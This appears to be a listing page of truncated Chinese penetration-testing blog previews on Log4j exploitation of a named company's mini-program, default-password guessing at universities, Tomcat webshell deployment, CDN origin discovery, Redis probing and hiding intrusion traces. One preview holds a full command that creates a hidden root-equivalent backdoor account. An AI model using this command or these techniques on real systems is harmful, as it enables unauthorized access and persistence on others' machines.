概述近期在对'美孚养护达人'微信小程序进行安全测试时，发现其后台系统存在严重的Log4j漏洞（CVE-2021-44228）。本文详细记录了漏洞发现、验证和利用的全过程，旨在为安全研究人员提供参考，同...

前言我们都知道像大学之类的各种平台的登录账号基本上是学号，初始登录密码基本上是学生身份证的后6位再拼接上一些带有学校缩写的英文字母。所以我们在找漏洞的时候可以换一种思路，先通过去找...

前言：对于不同的测试场景，如Web、小程序、App等，我们往往会使用不同的抓包方案来完成我们测试，以下便是笔者本人在不同场景下使用的三套抓包方案。WebWeb场景也是我们平常最多的抓包场景，而...

漏洞描述Tomcat 支持在后台部署 war 文件，可以直接将 webshell 部署到 web 目录下。其中，欲访问后台，需要对应用户有相应权限。Tomcat7+ 权限分为：manager（后台管理）manager-gui 拥有 html...

绕过CDN查询背后真实IP方法：方法一 DNS历史解析记录 查询域名的历史解析记录，可能会找到网站使用CDN前的解析记录，从而获取真实IP 相关查询的网站有：iphistory、DNS查询、微步在线、域名...

免责申明本教程的技术文章仅供参考，只用于教育目的，只是演示一些工具和工具的使用以及渗透思路，大佬勿喷，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进...

推荐阅读前言模拟器与win11内置的安卓子系统相比，那是一个天一个地，比模拟器香多了。windows 11 自带安卓子系统发布已经有一段时间了，但是目前并没有开放给中国用户，因此、下面这个教程，教...

前言前几天在网上冲浪，突然看见一个网站，第一反应：这该不会是杀猪盘后台吧。果断开始信息收集。先看看IP，在香港。先上nmap扫一波端口。开了6379端口。6379不就是redis默认端口吗？看看能不...

0x01 前景在进行fofa盲打站点的时候，来到了一个后台管理处看到集市二字，应该是edu站点 确认目标身份【归属】（使用的quake进行然后去ipc备案查询）  网站后台很像cms搭建的，在查看网站时...

入侵痕迹隐藏后门帐号添加账号test1，设置uid为0，密码为123456useradd -p `openssl passwd -1 -salt 'salt' 123456` test1 -o -u 0 -g root -G root -s /bin/bash -d /home/test1SSH隐身登录隐...

CloudFlare介绍CloudFlare是全球领先的CDN服务提供商，其提供的免费且足量的服务是诸多站长遭受网络攻击时的“避风港首先注册Cloudflare并接入域名：访问：https://www.cloudflare.com/zh-cn, ...

1. IP地址查询查看本机IP地址：ipconfig查看指定域名的IP地址：nslookup example.com2. 路由跟踪跟踪到指定域名的路由路径：tracert example.com3. 注册服务注册一个Windows服务：sc create...

Spug 软件介绍Spug 是一款开源的服务治理平台，可用于管理和监控服务器资源、配置文件、任务计划等。它具备易用、灵活和可扩展的特点，让用户能够更方便地管理和控制自己的服务器环境。功能特点...